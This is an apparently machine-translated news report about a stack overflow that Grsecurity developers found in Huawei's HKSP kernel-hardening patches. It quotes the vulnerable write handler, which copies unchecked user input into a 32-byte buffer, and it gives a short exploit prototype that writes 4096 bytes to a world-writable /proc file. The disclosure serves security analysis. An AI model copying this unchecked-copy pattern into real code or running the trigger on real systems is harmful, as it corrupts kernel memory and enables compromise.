Developers of the Grsecurity project attention to the presence of a trivially exploitable vulnerability in the patch set (Huawei Kernel Self Protection), a few days ago to improve the security of the Linux kernel. The situation reminds , in which an attempt to improve system security led to the emergence of a new vulnerability and made it easier to compromise devices.
The HKSP patches were published by a Huawei employee, include a mention of Huawei in the GitHub profile, and use the word Huawei in the project name (HKSP - Huawei Kernel Self Protection). At the same time, Huawei representatives denied the connection of the HKSP project with the company and stated that the code was developed on the employee’s personal initiative, is not an official Huawei project and is not used in the company’s products. On HKSP retroactively vulnerabilities also note that the project is being developed in my spare time for research purposes.
HKSP includes changes such as randomization of offsets in the cred structure, protection against attacks on the user identifier namespace (pid namespace), separation of the process stack from the mmap area, detection of double calls to the kfree function, blocking leaks through the pseudo-FS /proc (/proc/ {modules, keys, key-users}, /proc/sys/kernel/* and /proc/sys/vm/mmap_min_addr, /proc/kallsyms), improved user space address randomization, additional Ptrace protection, enhanced smap and smep protection , the ability to prohibit sending data via raw sockets, blocking incorrect addresses in UDP sockets and checking the integrity of running processes. It also includes the Ksguard kernel module, which is aimed at detecting attempts to introduce typical rootkits.
Patches Greg Kroah-Hartman, who is responsible for maintaining the stable branch of the Linux kernel, was of interest, and asked the author to break the monolithic patch into parts to simplify review and promotion to the main kernel. Kees Cook, head by active protection technology in the Linux kernel, also responded to the patches and, among the problems, drew attention to the binding to the x86 architecture and the notification nature of many modes, which only log information about the problem, but do not try to block it.
A study of the patch by Grsecurity developers revealed many errors and weaknesses in the code, and also showed the absence of a threat model that would allow them to adequately judge the capabilities of the project. To clearly demonstrate that the code was written without using secure programming methods, an example of a trivial vulnerability in the handler is given.
file /proc/ksguard/state, which is created with rights 0777, implying that everyone has write access. The ksg_state_write function, used to parse commands written to /proc/ksguard/state, creates a tmp[32] buffer to which data is written based on the size of the operand passed, without taking into account the size of the target buffer and without checking the parameter with the string size. Those. To overwrite part of the kernel stack, an attacker just needs to write a specially formatted line to /proc/ksguard/state.
static ssize_t ksg_state_write(struct file *file, const char __user *buf,
size_t len, loff_t *offset)
{
u64 value;
char tmp [32];
size_t n = 0;
if (copy_from_user(tmp, buf, len))
return -1;
value = simple_strtoul(tmp, '\0', 10);
...
Exploit prototype:
char buf[4096] = { };
int fd = open(“/proc/ksguard/state”, O_WRONLY);
if (fd >= 0) {
write(fd, buf, sizeof(buf));
close(fd);
}
Source: opennet.ru